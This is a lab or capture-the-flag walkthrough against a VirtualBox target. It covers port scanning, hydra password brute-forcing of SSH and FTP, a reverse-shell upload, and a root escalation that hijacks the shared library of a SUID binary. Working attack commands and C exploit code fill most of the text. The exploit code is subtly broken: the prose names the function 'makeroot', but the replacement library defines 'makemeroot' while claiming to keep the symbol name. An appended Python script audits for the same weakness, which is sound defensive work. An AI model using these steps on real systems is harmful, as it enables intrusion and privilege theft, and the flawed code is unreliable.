The target machine's IP is 192.168.56.113.

Port scan

sudo nmap --min-rate 10000 -p- 192.168.56.113      
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 03:38 UTC
Nmap scan report for 192.168.56.113 (192.168.56.113)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:5E:81:8A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.94 seconds
sudo nmap -sT -sV -sC -O -p21,22,80 192.168.56.113  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 03:39 UTC
Nmap scan report for 192.168.56.113 (192.168.56.113)
Host is up (0.00029s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-- 2 1001 33 4096 Oct 19 2020 html
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 09:0e:11:1f:72:0e:6c:10:18:55:1a:73:a5:4b:e5:64 (RSA)
| 256 c0:9f:66:34:56:1d:16:4a:32:ad:25:0c:8b:a0:1b:5a (ECDSA)
|_ 256 4c:95:57:f4:38:a3:ce:ae:f0:e2:a6:d9:71:42:07:c5 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:5E:81:8A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.34 seconds

FTP

Anonymous login is allowed, and there is an html directory, but for some reason I cannot change into it. Probably a permissions issue (the listing shows drwxr-xr--, so "other" has no execute bit on it).

Getting a shell

The website has nothing but its root page, but it gives away two usernames. First I tried brute-forcing alan's SSH password:

hydra -l alan -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.113

That failed.

Remembering the FTP service from earlier, I tried brute-forcing FTP instead:

hydra -l eleanor -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.113

This yields the password: ladybug

Log in to FTP again.

Now I can enter the html directory. There is nothing else in it, so I tried uploading a PHP reverse shell, but I still did not have permission.

Later I found that switching to an SFTP client allowed the upload, while plain FTP did not. After that I got the reverse shell.

eleanor's FTP password can then be used to switch to that user with su.

I can enter alan's home directory. I do not have permission to read note.txt, but there is an executable called random, and it has the SUID bit set.

Privilege escalation

Besides that there are also a .o file and a .h file. Decompiling random in IDA shows roughly this logic: if the number the user enters matches a generated random number (1-9), it calls the makeroot function. Maybe that is how we become root?

After blindly trying a few numbers, one of them matched, but it only returned:

SUCCESS!! But I need to finish and implement this function

So the function is unfinished? The content of rooter.o is nothing more than printing that string. It looks like the vulnerability is not here.

ldd random
linux-vdso.so.1 (0x00007ffe785e5000)
librooter.so => /lib/librooter.so (0x00007fe8bd4d0000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe8bd30f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe8bd4e1000)

It links against the shared library /lib/librooter.so, so that is where the makeroot function actually lives.

We can try replacing this shared library. Write a rooter.c:

#include <stdlib.h>
#include <unistd.h>   /* setuid()/setgid() are declared here, not in stdlib.h */

/* Keep the symbol name that the SUID binary resolves from librooter.so;
   because random runs with an effective uid of 0, setuid(0) succeeds and
   the shell it spawns is root. */
void makemeroot()
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

gcc -shared -fPIC rooter.c -o /lib/librooter.so

Compile it into a shared library that overwrites the original.

Run random again, enter the same number a few times until it matches, and we are root!
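Added example, not from the original writeup: a Python audit that looks for the class of misconfiguration used here, a SUID-root binary whose linked shared library (or the directory holding it) is writable by a non-root user. The function names, the weakness rules and the sample ldd text are my own construction; it assumes ldd is available on the host.

```python
"""Audit a SUID-root binary for linked shared libraries that a non-root user
could replace (the weakness exploited above: librooter.so in a writable /lib)."""
import os
import re
import stat
import subprocess

# ldd prints "name => /path (0xaddr)", or "/path (0xaddr)" for the loader; the
# vDSO has no file on disk and "not found" entries have no address, so both are skipped.
_LDD_LINE = re.compile(r"^\s*(?:\S+\s+=>\s+)?(/\S+)\s+\(0x[0-9a-f]+\)")

def parse_ldd(output):
    """Return the on-disk library paths listed in ldd output."""
    return [m.group(1) for m in map(_LDD_LINE.match, output.splitlines()) if m]

def weakness(mode, uid, dir_mode, dir_uid):
    """Why a library (mode, uid) in a directory (dir_mode, dir_uid) could be
    swapped by a non-root user, or None. A sticky directory stops non-owners
    from renaming or deleting root's file, so it does not count as writable."""
    if uid != 0:
        return "library not owned by root"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "library is group/world writable"
    if dir_uid != 0:
        return "directory not owned by root"
    if dir_mode & (stat.S_IWGRP | stat.S_IWOTH) and not dir_mode & stat.S_ISVTX:
        return "directory is group/world writable"
    return None

def audit_binary(path):
    """Run ldd on one binary and report libraries a non-root user could swap."""
    out = subprocess.run(["ldd", path], capture_output=True, text=True).stdout
    findings = []
    for lib in parse_ldd(out):
        try:
            st, dst = os.stat(lib), os.stat(os.path.dirname(lib))
        except OSError:
            continue
        why = weakness(st.st_mode, st.st_uid, dst.st_mode, dst.st_uid)
        if why:
            findings.append(f"{path}: {lib}: {why}")
    return findings

# Constructed sample: the ldd output for "random" shown in the writeup above.
SAMPLE_LDD = """\
    linux-vdso.so.1 (0x00007ffe785e5000)
    librooter.so => /lib/librooter.so (0x00007fe8bd4d0000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe8bd30f000)
    /lib64/ld-linux-x86-64.so.2 (0x00007fe8bd4e1000)
"""
```

Feed audit_binary() each result of find / -perm -4000 -user root -type f; on this box it would flag /lib/librooter.so for random, which is the finding a hardening pass should fix by making the library and /lib root-owned and non-writable.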

Afterthoughts

The first part was all quite easy; the later part needs some C basics, and I learned a bit along the way.